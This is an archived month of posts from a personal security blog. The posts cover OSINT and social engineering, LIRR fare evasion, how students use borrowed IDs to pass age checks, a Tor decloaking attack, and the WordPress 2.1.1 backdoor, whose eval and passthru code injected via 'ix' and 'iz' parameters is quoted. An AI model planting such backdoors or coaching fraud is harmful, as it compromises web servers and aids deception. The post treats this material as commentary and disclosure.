Archive for March, 2007

Int, search yet again

Sunday, March 25th, 2007

So, I read this article. [via clips]

For at least a year before the 2004 Republican National Convention, teams of undercover New York City police officers traveled to cities across the country, Canada and Europe to conduct covert observations of people who planned to protest at the convention, according to police records and interviews.

Refraining from any political commentary, I found the techniques used by the police here interesting.

They made friends, shared meals, swapped e-mail messages and then filed daily reports with the department’s Intelligence Division. Other investigators mined Internet sites and chat rooms.

And,

By searching the Internet, police investigators identified groups that were making plans for demonstrations. Files were created on their political causes, the criminal records, if any, of the people involved and any plans for civil disobedience or disruptive tactics.

From the field, undercover officers filed daily accounts of their observations on forms known as DD5s that called for descriptions of the gatherings, the leaders and participants, and the groups’ plans.

The CIA has talked about this too.

Collecting intelligence these days is at times less a matter of stealing through dark alleys in a foreign land to meet some secret agent than one of surfing the Internet under the fluorescent lights of an office cubicle to find some open source. The world is changing with the advance of commerce and technology. Mouse clicks and online dictionaries today often prove more useful than stylish cloaks and shiny daggers in gathering intelligence required to help analysts and officials understand the world.

These techniques are by no means limited to the police and TLAs, and even I have been tasked with performing similar measures at times. OSINT and HUMINT are remarkably effective at building profiles of people or organizations, and can as easily be leveraged for offense as for defense. For example, having a conversation with someone in a bar followed up by some quick research online can quickly lead to a profile of that person or, say, the organization for which they work. Or, take this blog – it can be used to learn quite a bit about me, including places I go, which can be leveraged to “run into” me in person and try to glean more.

Profiles built from this sort of intelligence can be useful for things like determining intent, identifying threats, and pinpointing weak links. For example, take an employee posting angry blog posts about their employer. Someone wanting to attack this organization might find this information valuable, as they could potentially leverage this person’s insider status in an attack. The organization itself could find this information useful, as it might identify an imminent insider threat to the organization.

Mapping out organizations is often one of the tools used in social engineering, and there is a wealth of information to be gathered from OSINT and HUMINT. For example, when you can talk the organizational lingo, it is much easier to convince people within that organization you can be trusted.

In other words, these tools provide people and organizations a useful means to help with the people factor in security.

These techniques can be employed for gathering competitive intelligence too, as discussed here.

What else do the typical competitive intelligence offerings include? I will list, at risk of being accused of trying to sell a server, which I am not, what I have been used to do in the past:

  • Obtain competitors latest public version of software for comparison purposes.
  • Perform a gap analysis between competitors software and the client’s.
  • Reverse engineer competitors software or portion of competitors software to take a look at what is going on under the hood.
  • Obtain competitor documentation.
  • Find security vulnerabilities in competitors product.
  • Attend competitor customer conferences to obtain road map and future feature information.
  • Interview for a senior technical or senior product management position at competitor only to obtain valuable information or even recruit key team members out.

Interesting stuff.

-

Pointing out interesting searches found in my logs has been a big hit with many of you. (I am waiting for the referrer forgeries.)

You talk about how some kids game IDs, and the next thing you know, searches like this turn up…

create+%22fake++id%22+php+script

Perhaps you were thinking of the tool created by this person, although I doubt it.

Protocol question…

ssl+similarities+ssh

Not sure if this helps, but I rather enjoyed this paper back in the day and got many people I used to work with to read it.

I found this search interesting…

multicamera+people+tracking++code+source

Anyone have pointers here? I performed the same google search quickly and turned up research [e.g., 1,2,3] on the topic and a common computer vision toolkit, OpenCV.

Lastly, these came from <s;snip>.<snip>.dhs.gov…

lirr+punching+ticket
why+do+they+punch+ticket+lirr

Conductors collect tickets by walking up and down the various cars of the trains and stopping at each person that has not yet been checked for tickets. Conductors punch tickets to indicate that tickets have been used, and persons whose tickets have already been punched are indicated by a placeholder the conductors put on the seats (as well as the punched ticket in many cases). Normally, they confiscate and then tear up a completely used ticket. Depending on the length of the trip, it might get punched by the conductor multiple times. For example, when I travel to and from Huntington, the ticket is punched once from origin to Jamaica, and then again from Jamaica to my destination, at which point the ticket is normally kept by the conductor. If such a ticket is only punched once, then it can still be used for the second half of the trip (i.e., Jamaica to destination).

This system keeps people that want to be honest honest, which is the vast majority of riders, including myself; however, as anyone that has ridden the LIRR regularly can tell you, there are many ways to hack this system. (Please note: Employing any of these examples is stealing from the LIRR, which could result in things like being fined or going to jail. Do not try any of this.) For example, by gaining an understanding of the various zones, which correlate to how much a trip will cost, and when a conductor checks tickets, you can find ways to pay less than you should (e.g., buying tickets for cheaper zones than your trip actually requires since the conductors only check tickets at certain points along the trip and generally do not remember your destination). Or, traveling during times when trains are crowded makes it pretty easy to avoid having to pay at all for some trips (e.g., between Jamaica and Penn), even though these “peak” times often correspond with higher rates. And so on.

Posted in Security | No Comments »

News quickies

Friday, March 23rd, 2007

Half of you seem to hate the type of post that follows, the other half seem to like it – either way, I don’t think I can talk about my current projects (pesky MNDAs), so this is as good as it gets.

-

News (sort of) that ties in with much of what I have been rambling on about of late

First, pseudo-news [via clips]…

Good looks could help guilty defendants dodge justice, researchers have said.

They reported that in an experiment jurors were more likely to convict suspects deemed ugly than those seen as attractive.

A beauty bias? Go figure.

And, beauty for captcha

Hotcaptcha is a new method/model of foiling bots, not by the typical ‘can you read the twisted letters in an acid-induced background’ or similar feats of ocular gymnastics, but by taking 3 photos rated high and 6 photos rated low from hotornot.com and asking you to pick the three hot looking girls, or guys.

We are beauty recognition machines, afterall. Of course, beauty itself has a blueprint, which could be leveraged for pattern matching. Anyway, fits in with my rambling post.

Next, news [via funsec]…

Mr Claes said of the thief: “He used no violence. He used one weapon -and that is his charm – to gain confidence. He bought chocolates for the personnel, he was a nice guy, he charmed them, got the original of keys to make copies and got information on where the diamonds were.

“You can have all the safety and security you want, but if someone uses their charm to mislead people it won’t help.”

Sounds like something these kids could have planned. Also, makes me think of my own bank ordeal.

Moving along, deconstructing a trojan [via ha.ckers.org]…

The code reveals that calls to functions in ws2_32.dll are used to establish itself as an LSP (layered service provider)
using the Winsock2 SPI (Service Provider Interface). It “goes in between” Internet Explorer and the socket used to send the data.
This is consistent with reading/enumeration of registry keys
having to do with network interfaces, zones, and namespace providers.
This is the mechanism used to bypass SSL/TLS and intercept the network data on the fly, before it is encrypted.

This post comes to mind. “Yeah right, crypto this.

Now, we come to framing

It’s conceivable that if someone wanted to try and frame you for a crime like the one described, its pretty easy to forge the same forensic evidence, then go out and commit the crime. The much discussd Cross-Site Request Forgery (CSRF) attack makes it trival for someone to force your browser to make a request you didn’t intend to make. Even seeding Google and MSN with undesirable search phrases. For example if I really wanted to, I could have loaded in these IMG SRCs on this page upon loading.

I guess this could be used for disinformation too. “I didn’t make those requests, it must have been that evil CSRF haxor.”

Finally, comments on pseudo-news…

The anonymous “editors” at SecurityFocus-A-Like IT Security Dot Com have whipped out the zero-day on the blogosphere, exploiting an obvious vulnerability (flattery injection) to hijack the keyboards of most of the security blogosphere. In this case, the vector for the attack seems to be a maliciously formatted OPML file.

Ptacek calls it a flattery injection attack. I would have called it an ego attack myself. Reminds me of this obvious people hack leveraged on security folks, or even this post, if only because ego may have been involved there too.

Posted in Off-topic, Security | No Comments »

Feed troubles

Saturday, March 17th, 2007

So, I noticed the our RSS2 feed started with a blank line, which made it invalid.

Screenshot of broken feed in Firefox 2

Then I noticed our atom feed started with a blank line. Then I noticed that every page generated by wordpress contained a blank line at the top. This annoyed me.

I checked if this was a known issue for 2.1.2 and did not find it there, so I assumed this problem was my own. I started poking around in the few PHP files I had modified since the last release of wordpress. No dice. Then, I poked around in the modifications I made to theme files, even though I thought that should have no impact on feeds. No dice.

Then I did a quick search on the wordpress support forums and noticed this thread. In it was the following.

Check your wp-config.php file. That’s a prime candidate for having an extra blank line at the top or bottom of the file. Same goes for your theme’s functions.php file, if you have one.

I had forgotten about that filewp-config.php, and it turned out our wp-config.php had a couple of extra linefeeds at the end. Removing these fixed the problem.

Screenshot of fixed feed in Firefox 2

This reminded me of how forgiving the web can be on syntax. And, for those with feedreaders that do the right thing, you too can now subscribe to the D-kriptik feeds (RSS or Atom)!

Posted in D-Kriptik | No Comments »

ID checks, search revisited again

Wednesday, March 14th, 2007

I probably sound like a broken record these days, but people are my interest right now. And, one of the things I really enjoy about exploring this area is that you get to meet a lot of people, and hear their takes on the people factor and security. So, while none of the following may be new to you, I found it interesting…

(Of note, this information is for my research purposes, and I am posting it here to foster discussion with some of my readers. Realize that there are real consequences to misrepresenting yourself at ID checks, such as being fined or going to jail. Do not try any of this.)

A couple of days ago, I was riding on the train, when a group of women pulled me into a conversation. Something about my shirt. We got to talking about places to go, and the next thing you know we were talking about ID requirements. Turned out, these ladies were college students and not quite legal drinking age, which is often a prerequisite to entering venues in NYC, and this was the motivation behind the attacks to be discussed.

Now it gets interesting. One of the women in this group actually had a stack of real IDs that were all for people of legal age. The IDs were gathered from friends and family (e.g., older sisters), whether given or taken (e.g., “borrowed without permission”). Basically, what these ladies did was figure out which IDs were the best matches for each of the members of the group, and then each of them tried to pass themselves off as legal age using the selected ID. They noted that the height and eye color listed on NY driver’s licenses was entered by the person getting the license, sometimes input into the system incorrectly, and not at all verified by the issuer. They also pointed out that NY driver’s license would note when a person required corrective lenses or contacts, which mattered since wearing (or not wearing) glasses could change appearance and wearing contacts could change eye color. More interesting though, they discussed how legitimate IDs let a place claim that it did its jobs at the door, as the facial recognition process itself was quite subjective (this made me think of plausible deniability – I told the ladies they should consider politics). Their impression of the effectiveness of this attack at getting them passed the ID check was at about 85%.

In order to up the probability of success, the ladies employed two secondary techniques. One technique was having the most adept social engineers of the group conduct the primary interactions with the ID checker. The ranking of such skills was subjective, but it generally came down to being attractive and social. The point of this was to get the checker in the frame of mind of wanting to allow the ladies to enter, which also implied getting the check to want to accept the IDs being presented. This was also used to avoid any signs of nervousness from the group and get them looking the part. The other technique was just memorizing the details on the ID and being ready for small talk with the ID checker (that applied to everyone, not just the primaries used in the first secondary technique) – such interactions were rare, but did happen from time to time. With these two simple measures in place, their impression of the effectiveness of the attack was at about 95%.

Ok, so these college students had a fairly debilitating attack against these subjective facial recognition ID checks, but it was based on obtaining a number of legitimate IDs – could they get rid of this requirement, bypassing IDs all together? Well, I inquired about what happens when they don’t have IDs. Besides noting that obtaining real IDs was “easy” right now and so there was no reason to make the attack more difficult, there were a few other interesting points they made, which applied both with the legitimate ID attack and without.

One of the keys to success they cited was doing their homework (e.g., reconnaissance). Knowing how strict a place was about IDs, knowing what had worked or not worked in the past, having profiles on the different bouncers (e.g., a “mean” to “nice” scale), having affiliations with particular gatekeepers (e.g., being friends with the doorman), understanding their current ID situation (e.g., did most of the group have real IDs? did none of the group have real IDs?) etc. was all involved here. Their social network was particularly important, as this information was shared among their peers and easy to come by knowing the right people (sounded like the hacker community to me).

These women knew exactly who were the skilled social engineers of the group, and those were the people they set loose on the bouncers. With the homework done, it often came down to these people’s skill sets once out there in the wild performing the attack. They actually pointed to a specific member of the group and said she could get in almost every door, sometimes because of contacts, most times because of personality, looks, and manipulation.

These ladies also understood the impact of beauty. Besides the obvious things like flirting with bouncers, they felt that most places were looking to attract beautiful women, because that in turn attracts everyone else, so places wanted to let them in. Also, they were careful to note here that beauty was important even with the legitimate ID attack, as they felt ID checkers sometimes did recognize the IDs were not really theirs, but, because they were an attractive group of women, it was in the place’s best interest to let the ladies in, given the plausible deniability factor.

Anyway, all of this sounded very similar to my recent ramblings, and so I thought it fitting for this blog. These sorts of attacks are not restricted to age verification ID checks by any means, and I even think the general methodology employed here ports to an extent to how to conduct attacks on systems in general.

-

After a long dry spell, the interesting search terms just keep on coming. It’s not a weekend, but so be it –

how+use+ix+wordpress+2.1.1

LOL. This post might be of interest.

Why+does+physical+beauty+threaten+people%3F

You might enjoy this post. Oh, and cool pseudo-fact – people tend to give beautiful people more personal space than not so beautiful people. I ran into a model last weekend and ask them to put it to the test – people flew out of their way when we walked down the street.

does+being+beautiful+go+a+long+way

You too might enjoy this post.

Posted in Anonymity & Privacy, Authentication & Identity, Security | 1 Comment »

Tor again

Thursday, March 8th, 2007

Via this thread on or-talk, I noted the following.

Amidst concerns that pedophiles are using public Tor (the Onion Router) servers to trade in child pornography, über-hacker HD Moore is building a tracking system capable of pinpointing specific workstations that searched for and downloaded sexual images and videos of kids.

Moore, the brains behind the Metasploit Project, has come up with a series of countermeasures that include using patched Tor servers and a decloaking engine to detect the exact location of a pedophile within an organization or residence.

The attack is a demonstration of how to compromise certain Tor users’ anonymity. HD Moore maliciously modifies data before it is passed into the Tor network in an attempt to get the victim’s web browser to bypass Tor once it receives that data out the other end of the Tor network. And, I imagine it would be trivial to modify the code to look for other search terms, or just target any Tor user that hits that node. Also, I am sure HD Moore could have just as easily used his malicious Tor node to inject payloads that exploit browser implementation flaws resulting in arbitrary code execution as well.

I have written about this sort of thing before.

Using modern web browsers in an anonymous manner is hard when someone is trying to penetrate that anonymity. All that scripting and dynamic content makes it even harder, as this example illustrates. And, given the vulnerabilities in web browsers that keep being discovered and actively exploited, the ability of an attacker to execute rogue code on an end-user’s machine simply by browsing a malicious web site seems like a given – in other words, no need for Java when you have document.getElementById().createTextRange() [e.g., 1, 2] (recently patched).

Also, it should be noted that this means of gathering an IP address is not an attack on TOR itself. The attack exploits tools being used outside of TOR, in particular a web browser with proxy support (somewhat) and enabled Java support – the end-user is not being protected by, or using, Tor and Privoxy, as their traffic is not being routed through these proxies on its way to the outside world. (Yeah right, crypto this?)

These attacks also illustrate honesty issues with Tor nodes that can impact the anonymity of the end Tor user, which I have commented on before.

While there is often logic thrown about that the larger the number of nodes in a mixnet, the stronger the anonymity, such logic often leaves out one key point, the honesty of the nodes. There is a reason remailer networks have traditionally been very small and (at least partially) maintained by some “trusted” nyms. Such honesty problems are not trivial to solve.

All that sounds bad, but I still think Tor is a good tool to use for general purpose anonymous browsing of the web with Firefox. Sure, it’s not perfect, but it works well enough when properly utilized – the majority of web sites you hit through Tor won’t know your real IP. I know I use it from time to time, on both Windows and FreeBSD machines. (As to attacks outside of those trying to compromise your Tor provided anonymity, well, I tend to think the risks of using Tor here are no greater than the normal risks you assume when you, say, use your computer to play on the Internet.)

The Windows Tor Tor & Privoxy & Vidalia bundle itself includes all the tools necessary to easily get Firefox pumping its traffic through Tor with the click of a green onion button. Add in, say, noscript, which is quite user friendly, and disable Java, javascript, and all plugins, and you are good to go against the attack HD Moore utilized. And, the people on the or-talk mailing list are more than willing to help with Tor related troubles.

Anyway, I think this publicity is a good thing in terms of bettering the usability of Tor. These attacks have been well understood by technical users of Tor since the beginning, and this has lit a fire in the Tor community on how best to teach non-technical users to properly utilize Tor. With the flame burning, you have to love the ultra quick response time of the Tor team. For example,

> >The problem is if it isn’t right on the download page and translated
> >into most languages, people will just assume they are good to go
> >without bothering to read the FAQ until something breaks (as Jason
> >pointed out). I also fall into this category with most software (even
> >stuff I develop for ;) .
>
> Hear, hear!
>

Yes. Three cheers. I think this is a fine interim thing to do.

Which has already resulted in a warning being added to the Tor download page.

Warning

Tor by itself is NOT all you need to maintain your anonymity. There are several major pitfalls to watch out for.

As to HD Moore’s countermeasures, this post in or-talk should be noted.

As a survivor of childhood sexual abuse. I’m personally getting annoyed
by this whole “nab the paedophiles thing”. for several reasons:

1.) 90+ percent of sexual abuse of children happen from family members
or friends of the family.. so wasting huge resources on 10% while
blatantly (and blissfully) ignoring the 90%, does society a huge
disservice. by focusing the public’s attention on the smallest part of
the problem and away from the real problems.

2.) I can almost guarantee that his guys “key words” would trigger on
abuse survivors talking in an online support group and I can’t even
begin to tell you how damaging it would be for an abuse survivor to have
to deal with being falsely accused of being a perp.

I say this a lot, and it fits here as well. Working in IT security means you have to be able to understand how an organization or system works – you build a big picture and then dig down into its parts. While my major interest at the moment is in gaining a better understanding of people, this, of course, also means understanding processes, policies, assets, technologies, etc. Without such an understanding, accurately assessing the risks to an organization or system, and then integrating effective and efficient security measures into that organization or system, is quite difficult or impossible.

Update: HD Moore’s Decloak.

Posted in Anonymity & Privacy, Security | 1 Comment »

No search from address bar, search revisited

Saturday, March 3rd, 2007

What is it with this search from address bar stuff? It annoys me to no end, and I have always turn it off in Internet Explorer. (To do so in IE7, go to Tools->Internet Options->Advanced->Search from Address bar->Do not search from the Address bar.)

So, I was trying to cut/paste a link into the address bar of Firefox 2, but I guess I messed up, and whatever buffer holds copy/paste data still had my previously copied data. I hit enter without thinking, and next thing I knew, Google was telling me it found no search results. While it was just a copy of my last blog post in that buffer, it could just have easily been something else.

I really don’t like this feature and did not realize it was even available, let alone turned on by default, in Firefox 2. To disable it in Firefox 2, browse to “about:config”, and set “keyword.enabled” to “false”. Good riddance.

-

This being a weekend and all, I might as well throw in a weekend post. So, speaking of searches, you may remember this – well, fun times taking a quick peek at recent log entries.

Somehow, we have become associated with dating advice…

does+a+bartista+like+me+%3F

In my neighborhood in NoVA, I once had a barista that liked me. She doubled the size of my drinks, which was quite nauseating when what I wanted was a triple espresso and instead received a giant coffee cup of espresso; however, I don’t think that fraud and nausea necessarily indicate romantic interest, so that is of no help to you. What may be of interest to you is that, when I talked to her about not giving me these horrific cups of espresso, the resulting conversation ended with a phone number exchange.

And, look at what turned up again…

lounges+in+manhattan+that+dont+ID

The list of places I go to may have changed, but the necessity of showing ID at all of these places has not. Anyway, my ramblings of late might be of use to you.

Oh, and the icing on the cake…

blogs++panty+pulling

Now that’s class.

Posted in D-Kriptik, Off-topic, Security | 1 Comment »

Wordpress 2.1.1 backdoor

Friday, March 2nd, 2007

We run wordpress for this blog. We tend to keep it up to date as well.

Now, wordpress issues seem to be a dime a dozen, so normally I wouldn’t say anything about them, but this was a bit interesting.

This morning we received a note to our security mailing address about unusual and highly exploitable code in WordPress. The issue was investigated, and it appeared that the 2.1.1 download had been modified from its original code. We took the website down immediately to investigate what happened.

These types of attacks can be particular effective, if executed well. Put in a clever, subtle backdoor, and maybe no one will notice. Pwned by default. (Poorly paraphrasing, someone I knew once argued that all features of a system that could lead to security compromises were just backdoors, whether they were intentionally put there or not – this included everything from holding a funky key combination at boot to gain a debug prompt to a stack-based buffer overflow that led to arbitrary code execution as root.)

Anyway, this was of particular interest to us.

If you are a web host or network administrator, block access to “theme.php” and “feed.php”, and any query string with “ix=” or “iz=” in it.

Normally, I do a diff between minor releases and upload those files that had changed. Sometimes I look at the output of the aforementioned diff beyond just building a list of what files had changed, but, generally, I only do so if something sparks my curiosity, or when I see fixes come across the wordpress mailing lists and I want to verify they were incorporated into the release. I am not sure whether I would have noticed such a diff varied from the list in the wordpress team’s blog post.

However, due to time constraints (read laziness) during the last upgrade, I just upgraded those files listed as changed in this blog post.

Files changed in 2.1.1 from 2.1:

Noticeably absent in that list is “theme.php” and “feed.php”. Maybe that’s a good thing.

(Oh, and the open source versus closed source debate with regards to backdoor’d code already happened quite loudly when this was announced. Of course, wordpress is just a bunch of PHP scripts anyway.)

Update: Here are the details.

The compromised files are wp-includes/feed.php and wp-includes/theme.php.
The following code has been added:

in wp-includes/feed.php

function comment_text_phpfilter($filterdata) {
eval($filterdata);
}

if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }

in wp-includes/theme.php

function get_theme_mcommand($mcds) {
passthru($mcds);
}

if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }

It seems that the above files were changed on Feb 25th, 2007, so if you downloaded WordPress between Feb 25th, 2007 and Mar 2nd 2007 it is possible that you are running a compromised version, so be sure to check for the above code.

Posted in D-Kriptik, Security | No Comments »